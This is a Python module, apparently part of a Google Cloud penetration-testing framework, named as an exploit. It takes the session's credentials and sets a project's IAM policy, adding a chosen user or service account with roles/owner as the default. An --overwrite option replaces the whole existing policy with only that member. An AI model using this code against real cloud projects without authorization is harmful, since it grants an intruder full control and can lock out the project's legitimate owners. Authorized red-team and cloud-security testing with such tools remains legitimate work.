exploit_project_setiampolicy.py

from Modules.ResourceManager.utils.util_helpers import *

# Entrypoint
def run_module(user_args, session, first_run = False, last_run = False):
    
    # Set up Argparser to handle flag arguments
    parser = argparse.ArgumentParser(description="Set the IAM Policy for a Given Project", allow_abbrev=False)
    
    # Debug/non-module specific
    parser.add_argument("-v","--debug",action="store_true",required=False,help="Get verbose data during the module run")
    
    parser.add_argument("--project-name", type=str, required=False,  help="Folder system name (not user-assigned common name) ex: folders/ID")
    
    parser.add_argument("--role", type=str, required=False,  help="Role to add (format - roles/<role_name>)")
    parser.add_argument("--member", type=str, required=False,  help="User to add to the policy at the given role (format - user:<email> / serviceAccount:<email>)")
    parser.add_argument("--overwrite", action="store_true", required=False,  help="If the current policy cannot be gathered and appended to, rewrite entire IAM policy with just your member")

    args = parser.parse_args(user_args)

    project_id = None

    debug = args.debug

    project_client = resourcemanager_v3.ProjectsClient(credentials=session.credentials)

    project_name, member, role = None, None, None

    if args.project_name:
        project_name = args.project_name
        status, incorrect_input = UtilityTools.validate_input_format(project_name, 2)
        if status != 0: 
            print(f"{UtilityTools.RED}[X] Value \"{incorrect_input}\" is incorrect. Must be 'projects/[project_number]' Please try again...{UtilityTools.RESET}")
            return -1

    if args.member:

        member = args.member
        status, incorrect_input = UtilityTools.validate_user_format(member)
        if status != 0: 
            print(f"{UtilityTools.RED}[X] Value \"{incorrect_input}\" is incorrect. Must be 'user:[email]' or 'serviceAccount:[email]' Please try again...{UtilityTools.RESET}")
            return -1

    if args.role:
        role = args.role

    if not project_name:
        rows_returned = session.get_data("abstract-tree-hierarchy", columns = ["name", "display_name","project_id"], conditions = "type=\"project\"")
        if len(rows_returned) == 0:
            print("[X] No projects found. Try rerunning module with with specified resource via --project-name ")
            return -1
        
        for row in rows_returned:
            name, display_name, project_id = row["name"], row["display_name"], row["project_id"]
            row["display_to_user"] = f"{name} (Project ID: {project_id}; Common Name: {display_name})"

        # Return dictionary corresponding to user choice
        project_dict = session.choice_selector(rows_returned,"Choose an existing project from below to edit the corresponding policy::", fields=["display_to_user"])
        if not project_dict:
            print("[X] Exiting the current module...")
            return -1        

        # Project ID could be "Unknown"
        project_name = project_dict["name"]
        project_display_name = project_dict["display_name"]
        project_id = project_dict["project_id"]

    if not member:
        member = session.choose_member()
        if not member:
            print("Exiting...")
            return -1

    if not role:
        default_role = "roles/owner"
        allowed_project_roles_menu = [
            f"{default_role} (Default)",
            "roles/editor",
            "roles/viewer",
            "roles/resourcemanager.projectIamAdmin",
            "roles/resourcemanager.projectCreator"
        ]
        role = session.choose_role(allowed_project_roles_menu, chosen_role = args.role, default_role = default_role)
        if not role:
            return -1

    if debug:
        print(f"[DEBUG] Proceeding with:\n  Project:{project_name}\n")
        print(f"[DEBUG] Proceeding with member: {member}")
        print(f"[DEBUG] Proceeding with role: {role}")

    print(f"[*] Binding Member {member} on {project_name} to role {role}")

    # Note project ID needs to exist to save perm
    action_dict = {}

    status = add_project_iam_member(project_client, project_name, member, action_dict, brute = args.overwrite, role = role, debug=debug)

    if status:
        if status == -1:
            print(f"{UtilityTools.RED}{UtilityTools.BOLD}[X] Failed to add {member} to policy of project {project_name}{UtilityTools.RESET}")
        else:
            print(f"{UtilityTools.GREEN}{UtilityTools.BOLD}[*] Successfully added {member} to the policy of project {project_name}{UtilityTools.RESET}")
   
    if action_dict and project_id: session.insert_actions(action_dict, project_id)